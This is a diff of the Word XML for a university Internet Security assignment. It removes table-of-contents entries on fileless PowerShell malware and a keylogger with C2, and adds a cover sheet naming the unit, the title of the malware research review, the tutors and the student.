-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070985" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>3.1 Fileless Malware Using PowerShell + Metasploit</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070985 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070986" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>3.2 Keylogger-Based Malware with C2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070986 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070987" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>4. Comparative Analysis</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070987 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070988" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>5. Evaluation &amp; Recommendations</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070988 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070989" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>6. Conclusion</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070989 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>16</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070990" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>7. References</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070990 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>17</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:r>
-            <w:rPr>
-              <w:b/>
-              <w:bCs/>
-              <w:noProof/>
-            </w:rPr>
-            <w:fldChar w:fldCharType="end"/>
-          </w:r>
-        </w:p>
-      </w:sdtContent>
-    </w:sdt>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>School of Science, Computing, and Engineering Technologies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>ASSIGNMENT AND PROJECT COVER SHEET</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Unit Code:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>COS80013</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Unit Title:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Internet Security</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                          </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Assignment number and title:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Assignment-1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A comparative research review of cyber-attacks and cyber security focusing on Malware </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>rom an Attackers Perspective</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Due date:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>13 /04/2025</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Lab/tut</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> group:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Friday – 6:30 pm lab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Tutor:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Yasa Akurudda Liyanage Don</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Lecturer:     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Rory </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Coulter ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Yasa Akurudda Liyanage Don</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Family name:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Arun Ragavendhar Arunachalam </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Palaniyappan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Id</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> no:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>104837</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>57</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>To be completed if this is an INDIVIDUAL ASSIGNMENT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>I declare that this assignment is my individual work. I have not worked collaboratively nor have I copied from any other student’s work or from any other source except where due acknowledgment is made explicitly in the text, nor has any part been written for me by another person.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
